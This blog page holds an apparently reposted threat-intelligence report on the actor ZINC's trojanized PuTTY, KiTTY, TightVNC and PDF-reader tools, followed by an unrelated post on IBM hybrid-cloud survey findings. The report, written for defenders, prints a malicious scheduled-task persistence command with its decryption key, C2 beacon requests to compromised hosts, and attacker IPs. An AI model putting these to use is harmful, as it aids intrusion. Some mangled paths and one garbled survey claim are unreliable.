
Impersonation and establishing contact

ZINC was discovered by LinkedIn Threat Prevention and Defense making fake accounts pretending to be recruiters for tech, defense, and media entertainment businesses to divert targets away from LinkedIn and into the secure messaging platform WhatsApp for the distribution of malware. Engineers and technical support staff employed by media and IT businesses with locations in the US, UK, and India were the main targets of ZINC. Targets got outreach that was specific to their industry or educational background and were urged to apply for a position at one of several reputable businesses. LinkedIn quickly canceled any accounts connected to fraudulent or dishonest behavior for accounts uncovered in these assaults in compliance with its policy.

Fraudulent recruiter profile
Figure 2. Fraudulent recruiter profile

Multiple methods used for delivery of ZetaNile

The ZetaNile virus family has been identified as the source of at least five techniques of malware open-source apps that contain harmful payloads and shellcode. The ZetaNile implants, also referred to as BLINDINGCAN, have been discussed in reports from CISA and JPCERT. The implant DLLs of the ZetaNile malware family are either encrypted with unique algorithms or loaded with commercial software protectors like Themida and VMProtect.

Figure 3 illustrates how the malicious DLL’s payload is decrypted using a special key that is given during the DLL search order hijacking of the genuine Windows process. The ZetaNile implants send command and control (C2) HTTP requests to known exploited C2 domains using special proprietary encryption techniques or AES encryption. These C2 communications can blend in with normal traffic by encoding the victim information in the parameters for popular keywords like game type or bbs in the HTTP POSTs.

The weaponization of SSH clients

ZINC operationalized malicious versions of the SSH clients PuTTY and KiTTY, which served as the entry point for the ZetaNile implant, after connecting to their target. Both applications offer terminal emulator support for many networking protocols, which attracts users who are usually the targets of ZINC. The weaponized versions were usually sent as ISO or ZIP compressed archives. The recipient will find a ReadMe.txt file and an executable program inside that archive. Running the bundled executable does not remove the ZetaNile implant as part of the advancement of ZINC’s malware development and an effort to bypass conventional defenses. The IP specified in the ReadMe.txt file is required by the SSH software for ZetaNile to be deployed. Below is a sample of what that file might contain:

Server: 137[.]184[.]15[.]189
User: [redacted]
Pass: [redacted]

Weaponized PuTTY malware

For many years, ZINC has used malware PuTTY as a component of its attack chain. The most current iteration creates persistence on infected devices by making use of scheduled activities. Mandiant recently alerted them to this activity. The malicious PUTTY.exe is set up to copy C:WindowsSystem32colorcpl.exe to C:ProgramDatacolorcpl.exe after installing the Event Horizon virus in C:ProgramDatacolorui.dll. ZINC can load the second stage malware colurui.dll and decode the payload with the key “0CE1241A44557AA438F27BC6D4ACA246” to be utilized for command and control by exploiting DLL search order hijacking. Once connected to the C2 server, the attackers can use the compromised device to install other malware for different purposes.

As part of the configuration for the weaponized PuTTY, a daily scheduled task called PackageColor is created, establishing persistence. ZINC achieves this with the command shown below:

PuTTY scheduled task as part of persistence
Figure 3. PuTTY – scheduled task as part of persistence

Weaponized KiTTY malware

ZINC has long used a weaponized version of PuTTY, but they have just lately expanded their weapons to include weaponizing KiTTY, a fork of PuTTY. The application gathers the target system’s username and hostname before sending them via TCP/22 to a hardcoded IP address, 172[.]93[.]201[.]253. The malicious KiTTY program decodes numerous times before establishing a successful TCP connection to the server at 137[.]184[.]15[.]189, after which it deploys the malware as %AppData%mscoree.dll. The ZetaNile malware family’s embedded payload, identified as EventHorizon, is the mscoree.dll file. Similar to ZINC’s PuTTY, the actor loads malicious DLL files that operate in the context of these legitimate Windows processes using DLL search order hijacking, notably through %AppData%KiTTY%PresentationHost.exe -EmbeddingObject.

Screenshot of Windows process that ZINC hijacks through DLL search order hijacking
Figure 4. KiTTY – DLL search order hijacking

The mscoree.dll malware is modularized so that, after connecting successfully to the compromised C2 domain, the attackers can add new malware to the target system as necessary by using the C2 communication that is already in place. For example, the attackers could run C:ProgramDataCiscofixmapi.exe -s AudioEndpointBuilder to load malicious mapistub.dll from the C2 server. A unique ID for the field game type and a hardcoded value for the field type are included in the HTTP POST requests, which are used to track malware campaign activity. These features are described below:

POST /wp-includes/php-compat/compat.php HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Host: olidhealth[.]com
Connection: Keep-Alive
Cache-Control: no-cache  

gametype=[UniqueId]&type=O8Akm8aV09Nw412KoWJds

Weaponized TightVNC Viewer

ZINC was discovered using a trojanized TightVNC Viewer that was sent to a target together with a weaponized SSH tool over WhatsApp starting in September 2022. The PDBPath for this malware is special:

N:\2.MyDevelopment\3.Tools_Development\4.TightVNCCustomize\Munna_Customize\tightvnc\x64\\Release\tvnviewer.pdb

The weaponized versions of TightVNC Viewer were frequently distributed via online services like WhatsApp as compressed ZIP archives or job description-themed ISO files. The recipient will find a ReadMe.txt file and an executable program inside that archive. The following is in the text file (.txt):

Platform: 2nd from the list
User: [redacted]
Pass: [redacted]

The malicious TightVNC Viewer has a pre-populated list of remote hosts as part of the threat actor’s most recent malware technique to get past traditional defenses, and it is set up to only install the backdoor when the user chooses ec2-aet-tech.w-ada[.]amazonaws from the drop-down menu, as shown in Figure 5:

Weaponized TightVNC Viewer – user interface
Figure 5. Weaponized TightVNC Viewer – user interface

The malware was set up to establish VNC sessions to the same IP on port TCP/5900 and submit the victim’s username and hostname to IP 44[.]238[.]74[.]84 as part of the victim’s check-in with the C2. The integrated second stage DLL payload from TightVNC.exe is loaded in memory once a successful connection to the server IP has been made in order to start C2 communication to a known compromised domain.

The weaponization of Sumatra PDF reader and muPDF/Subliminal Recording installer

Sumatra PDF and muPDF/Subliminal Recording installation are two malicious versions of PDF readers that ZINC has operationalized and which serve as the entry point for the ZetaNile implant. This method of delivery is commonly used in connection with fake job advertising sent to targets looking for employment in the IT and defense industries. The weaponized versions were usually sent in ZIP archives that had been compressed. The recipient will find an executable file inside that archive. The muPDF/Subliminal Recording installer can set up the backdoor without loading any malicious PDF files, in contrast to the malicious Sumatra PDF reader, which is a fully working PDF reader and can load the malicious implant from a false PDF.

Trojanized Sumatra PDF Reader

ZINC has been using SecurePDF.exe, a trojanized version of Sumatra PDF Reader, since at least 2019 and it continues to be special ZINC tradecraft. By loading a weaponized job application-themed PDF file, SecurePDF.exe, a modularized loader, can install the ZetaNile implant. When opened in the Sumatra PDF Reader, the fake PDF is rendered with the header “SPV005”, a decryption key, an encrypted second stage implant payload, and an encrypted decoy PDF.

The victim’s system hostname and device information are sent to a C2 communication server using unique encoding techniques once the second stage malware has been loaded in memory as part of the C2 check-in procedure. Using a C2 connection, the attackers can add more malware as needed to the hacked devices.

SecurePDF interface
Figure 6. SecurePDF interface

Trojanized muPDF/Subliminal Recording installer

Setup.exe is programmed to check for the existence of the file path ISSetupPrerequisitesSetup64.exe and write C:colrctlcolorui.dll to disk after extracting the embedded executable inside setup.exe in the malware version of the muPDF/Subliminal Recording installation. Then it moves ColorCpl.exe from C: WindowsSystem32 to ColorCtrl. The malicious installation generates a new process named C:colorctrlcolorcpl.exe with the input C3A9B30B6A313F289297C9A36730DB6D, which is then supplied to colorui.dll as a decryption key for the second stage of the infection. When a victim checks in, the DLL colorui.dll, which Microsoft is tracking as part of the EventHorizon malware family, is injected into credwiz.exe or iexpress.exe to perform C2 HTTP requests and obtain additional malware.

POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]com

bbs=[encrypted payload]= &article=[encrypted payload] 

Microsoft will keep an eye on ZINC activity and put protections in place for our users. Below is a list of the detections and IOCs that are currently active across all of our security solutions.

Recommended customer actions

The following security considerations can be employed to mitigate the methods the actor used and are stated in the “Observed actor activity” section:

  • Investigate whether they exist in your environment and make an assessment of any potential breaches using the indicators of compromise that are presented.
  • Block incoming traffic from the IPs listed in the table “Indicators of Compromise.”
  • To ensure validity and look into any unusual activity, review all authentication activity for the remote access infrastructure, paying special attention to accounts set up using single-factor authentication.
  • To reduce the risk of credentials being stolen, enable multifactor authentication (MFA) and make sure that it is enforced for any remote connectivity. NOTE: To secure your accounts, Microsoft highly advises all customers to download and use password-less solutions like Microsoft Authenticator.
  • Inform end users about how to avoid getting infected with malware, including how to ignore or delete unusual and unwanted emails that contain ISO attachments. Encourage end users to exercise excellent credential hygiene; restrict access to accounts with local or domain admin rights and enable Microsoft Defender Firewall to stop malware from spreading and being infected.
  • End users should receive instructions on how to secure their private and professional information on social media, filter unwelcome mail, spot spear-phishing emails, and watering holes, and report any unusual behavior or recon attempts.

Indicators of compromise (IOCs)

The list of IOCs found during our investigation is shown below. We advise our customers to look into these indicators in their settings and put detections and protections in place to identify previous relevant activity and stop future attacks on their systems.

Indicator Type Description
Amazon-KiTTY.exe File name
Amazon_IT_Assessment.iso File name
IT_Assessment.iso File name
amazon_assessment_test.iso File name
SecurePDF.exe File name
C:\ProgramData\Comms\colorui.dll File path Malicious PuTTY implant
%APPDATA%\KiTTY\mscoree.dll File path Malicious KiTTY implant
172.93.201[.]253 IP address Adversary C2 server
137.184.15[.]189 IP address Adversary SSH server
44.238.74[.]84 IP address Hard-coded VNC Server IP for malicious TightVNC
c:\windows\system32\schtasks.exe /CREATE /SC DAILY /MO 1 /ST 10:30 /TR “C:\Windows\System32\cmd.exe /c start /b C:\ProgramData\PackageColor\colorcpl.exe 0CE1241A44557AA438F27BC6D4ACA246” /TN PackageColor /F Scheduled task name Putty.exe – Scheduled task
1492fa04475b89484b5b0a02e6ba3e52544c264c294b57210404b96b65e63266 SHA-256 Malicious Putty.exe
aaad412aeb0f98c2c27bb817682f08673902a48b65213091534f96fe6f5494d9 SHA-256 Malicious colorui.dll
63cddab76e9d63e3cbea421b607342735d924e462c40f3917b1b5fbdf8d4a20d SHA-256 Malicious Amazon-Kitty.exe
e1ecf0f7bd90553baaa83dcdc177e1d2b20d6ee5520f5d9b44cdf59389432b10 SHA-256 Malicious KiTTY implant for mscoree.dll
c5a470cdf6f57125a8671f6b8843149cc78ccbc1a7bc615f34b23d9f241312bf SHA-256 Weaponized Sumatra PDFReader.exe
71beb4252e93291c7b14dfcb4cbb5d58144a76181fbe4aab3592121a3dbd9c55 SHA-256 Weaponized muPDF/Subliminal Recording installer
olidhealth[.]com/wp-includes/php-compat/compat.php Compromised domain
hurricanepub[.]com/include/include.php Compromised domain
turnscor[.]com/wp-includes/contacts.php Compromised domain
elite4print[.]com/support/support.asp Compromised domain
cats.runtimerec[.]com/db/dbconn.php Compromised domain
recruitment.raystechserv[.]com/lib/artichow/BarPlotDashboard.object.php Compromised domain
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39 User agent Hardcoded Kitty.exe UA
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E) User agent Hardcoded SecurePDF.exe UA
N:\2.MyDevelopment\3.Tools_Development\4.TightVNCCustomize\Munna_Customize\tightvnc\x64\\Release\tvnviewer.pdb PDBPath PDBPath for malicious TightVNC
37e30dc2faaabaf93f0539ffbde032461ab63a2c242fbe6e1f60a22344c8a334 SHA-256 Malicious TightVNC
14f736b7df6a35c29eaed82a47fc0a248684960aa8f2222b5ab8cdad28ead745 SHA-256 Malicious TightVNC

NOTE: These signs should not be viewed as being all-inclusive for the activity being monitored.

Detections

Microsoft Defender Antivirus

Customers of Microsoft Defender Antivirus and Microsoft Defender for Endpoints should pay attention to behavior associated with these attacks under the following family names:

  • ZetaNile
  • EventHorizon
  • FoggyBrass
  • PhantomStar

Microsoft Defender for Endpoint

The activities linked to this threat may be indicated by the following Microsoft Defender for Endpoint alerts. However, these alerts might also be set off by unrelated threat activities.

  • Suspicious Task Scheduler activity
  • Suspicious connection to remote service
  • A suspicious file was observed
  • An executable loaded an unexpected dll
  • Possible theft of remote session credentials
  • Suspicious connection to remote service

Microsoft 365 Defender

Customers of Microsoft 365 Defender can use the following advanced hunting queries to find connected activity:

  • Suspicious mapistub.dll file creation

Look for PresentationHost.exe when it creates mapistub.dll since it will likely be used in attacks that hijack DLL search order.

DeviceFileEvents
| where InitiatingProcessFileName =~ "presentationhost.exe"
| where FileName =~ "mapistub.dll"
  • Suspicious mscoree.dll file creation

Analyze any mscoree.dll instances PuTTY processes have produced.

DeviceFileEvents
| where InitiatingProcessFileName hassuffix "kitty.exe" or InitiatingProcessVersionInfoInternalFileName has "PuTTY"
| where FileName =~ "mscoree.dll"
  • Suspicious colorcpl.exe image load

Surface instances of a DLL search order hijacking attack include the colorcpl.exe process loading colorui.dll in a path other than the one expected.

DeviceImageLoadEvents 
| where InitiatingProcessFileName =~ "colorcpl.exe"
| where FileName =~ "colorui.dll" and not(FolderPath has_any("system32", "syswow64", "program files"))

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in MicrosoftTagged Leave a Comment on ZINC’s use of open-source software as a weapon

Understanding how the cloud is growing at the moment

Posted on by Marbenz Antonio

History & Evolution of Cloud Computing: What to Expect in 2025

Enterprises must be able to use applications and data at scale across the enterprise IT infrastructure to unlock revolutionary business performance. These possibilities are made possible with speed and security by mastering hybrid clouds.

Every year, the IBM Transformation Index: State of Cloud contributes to the development of a sophisticated understanding of the state of cloud transformation. This helps global enterprises make informed technology investments and enables companies to benchmark their development.

In a recent report entitled “A comparative look at enterprise cloud strategy: IBM Transformation Index: the State of Cloud” from the IBM Institute for Business Value (IBV), the development of this index is described in detail. According to the report, the index is based on deep data analysis of survey responses from 3,000 C-suite business and technology leaders from 12 countries and 15 industries. The survey’s important findings are highlighted, enabling corporate executives to assess and develop hybrid cloud management.

Although hybrid cloud architecture has taken over, few people still innovate and manage cloud infrastructures holistically

The Index shows a significant link between the deployment of hybrid clouds and the advancement of digital transformation. In fact, according to 71% of those polled, a sound hybrid cloud strategy makes it difficult to fully achieve the potential of a digital transformation. At the same time, just 27% of those polled meet the criteria for being classified as “advanced.”

Companies first believed that moving to the cloud would give them scalability, lower expenses, and minimize technical debt. To make new working methods possible, organizations must first decide how they wish to integrate cloud assets with the rest of their estate. Businesses must develop a strong hybrid cloud strategy that helps supply the capabilities required to accomplish the desired business outcomes rather than simply adding more clouds to fulfill business objectives.

The initial excitement surrounding cloud computing is gradually changing toward companies working with the CIO and asking questions such as:

  • Why ought I switch to the cloud?
  • How would it accelerate the accomplishment of my company goals?
  • What skills do I need to use the cloud effectively?
  • Which applications should be relocated, updated, or brand-new?

These issues can be resolved and businesses can establish an architecture for delivering a single, secure hybrid cloud platform that meets their needs.

Lack of skills and talent is a limiting factor

69% of respondents claim that their team lacks the necessary expertise to manage their cloud apps. This limits the effectiveness and efficiency of people’s labor together with each cloud producing its operating silo.

Take into account the following actions to build a team of cloud-savvy resources and a single efficient hybrid cloud operating model:

  • Establish a strategic workstream on a people agenda first.
  • Enable a cloud Center of Excellence (CoE) to implement the hybrid cloud operating model so that the required expertise can be developed and incubated.
  • With a skills and experience development program, you can empower your team, speed up execution, and succeed with the hybrid cloud operating model.

As you proceed along this path, first describe the work necessary for hybrid cloud operations, then change your organizational structure.

Businesses have the means to secure cloud workloads, but there are still issues

The study results show that security is a worry for many respondents who feel that the public cloud is not secure for their data, despite the widespread adoption and use of security technologies.

More than 90% of the financial services, telecommunications, and governmental organizations that replied have implemented security solutions including multifactor authentication and confidential computing capabilities. Organizations still face limitations that impede them from promoting innovation, though. In actuality, security is identified by 32% of respondents as the main obstacle to integrated workloads across environments, and more than 25% of respondents concur that security concerns make it difficult to achieve their cloud business objectives.

A dynamic hybrid cloud architecture requires a modern security strategy that moves as quickly as the application and data layer innovations. With this strategy, security is integrated throughout the creation of hybrid cloud products. Down to the level of the workload, it holds system owners and developers responsible for implementing security and privacy best practices in every code release.

Regulatory and regulatory barriers may prevent cloud goals from being accomplished

Regulations increase with time, and compliance issues follow. Nearly one-third of respondents say that regulatory compliance problems are a major issue in integrating workloads across private and public IT systems, and 53% of respondents think that maintaining compliance in the cloud is too challenging. This is especially true for highly regulated areas like financial services, where more than 25% of respondents concur that complying with industry standards is preventing them from moving forward. It is essential to incorporate these requirements as a fundamental part of the hybrid cloud architecture and operating model because they will always be necessary.

There are high expectations for what the cloud can do to support business transformation, and there is a growing understanding of what it will require. The art of mastering hybrid clouds is still far from complete.

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in IBMTagged , , Leave a Comment on Understanding how the cloud is growing at the moment